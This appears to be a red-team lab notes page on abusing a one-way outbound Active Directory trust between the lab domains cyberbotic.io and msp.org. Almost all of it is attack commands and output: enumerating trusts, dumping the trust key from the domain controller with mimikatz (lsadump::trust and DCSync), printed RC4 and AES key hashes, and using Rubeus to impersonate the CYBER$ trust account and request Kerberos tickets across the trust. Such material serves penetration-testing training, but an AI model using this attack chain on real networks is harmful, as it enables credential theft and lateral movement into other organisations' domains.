One-Way Outbound

SourceName      : cyberbotic.io
TargetName      : msp.org
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FILTER_SIDS
TrustDirection  : Outbound
WhenCreated     : 8/16/2022 9:49:17 AM
WhenChanged     : 8/16/2022 9:49:17 AM

Obtain "domain user" access from CYBER to MSP by leveraging the shared credential for the trust

ADSearch.exe --search "(objectCategory=trustedDomain)" --domain cyberbotic.io --attributes distinguishedName,name,flatName,trustDirection

Move laterally to the DC itself and dump from memory

mimikatz lsadump::trust /patch

Domain: MSP.ORG (MSP / S-1-5-21-616357355-3455548143-339820157)
[  In ] CYBERBOTIC.IO -> MSP.ORG

[ Out ] MSP.ORG -> CYBERBOTIC.IO
8/16/2022 9:49:17 AM - CLEAR   - 93 8e aa 1f 5f 6e 2a cc 51 7d d4 a8 07 f2 f0 2c a3 e0 20 3b 24 32 68 58 0d f8 ad cc
aes256_hmac       5db44be4317433d5ab1d3dea5925126d295d3e21c9682bca7fef76bc5a878f30
aes128_hmac       9851d2d80411e6d40122005d1c361579
rc4_hmac_nt       f3fc2312d9d1f80b78e67d55d41ad496

[ In-1] CYBERBOTIC.IO -> MSP.ORG

[ Out-1] MSP.ORG -> CYBERBOTIC.IO
8/16/2022 9:49:17 AM - CLEAR   - 93 8e aa 1f 5f 6e 2a cc 51 7d d4 a8 07 f2 f0 2c a3 e0 20 3b 24 32 68 58 0d f8 ad cc
aes256_hmac       5db44be4317433d5ab1d3dea5925126d295d3e21c9682bca7fef76bc5a878f30
aes128_hmac       9851d2d80411e6d40122005d1c361579
rc4_hmac_nt       f3fc2312d9d1f80b78e67d55d41ad496

Use DCSync with the TDO's GUID

powershell Get-DomainObject -Identity "CN=msp.org,CN=System,DC=cyberbotic,DC=io" | select objectGuid

objectguid
b93d2e36-48df-46bf-89d5-2fc22c139b43

mimikatz @lsadump::dcsync /domain:cyberbotic.io /guid:{b93d2e36-48df-46bf-89d5-2fc22c139b43}

(same results)

[Out] and [Out-1] are the "new" and "old" passwords respectively (they're the same here because 30 days hasn't elapsed since the creation of the trust). In most cases, the current [Out] key is the one you want. In addition, there is also a "trust account" which is created in the "trusted" domain, with the name of the "trusting" domain. For instance, if we get all the user accounts in the DEV domain, we'll see CYBER$ and STUDIO$, which are the trust accounts for those respective domain trusts.

Find trust accounts

ADSearch.exe --search "(objectCategory=user)"

[*] TOTAL NUMBER OF SEARCH RESULTS: 11

[+] cn : CYBER$
[+] cn : STUDIO$

This means that the MSP domain will have a trust account called CYBER$, even though we can't enumerate across the trust to confirm it.

Impersonate CYBER$ to request Kerberos tickets across the trust

Rubeus.exe asktgt /user:CYBER$ /domain:msp.org /rc4:f3fc2312d9d1f80b78e67d55d41ad496 /nowrap

(Remember that RC4 tickets are used by default across trusts.)

This TGT can now be used to interact with the domain

Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFLz[...snip...]MuaW8=

steal_token

Last updated 2 years ago

hashtagObtain "domain user" access from CYBER to MSP by leveraging the shared credential for the trust

hashtagMove laterally to the DC itself and dump from memory

hashtagUse DCSync with the TDO's GUID

hashtagFind trust accounts

hashtagImpersonate CYBER$ to request Kerberos tickets across the trust

hashtagThis TGT can now be used to interact with the domain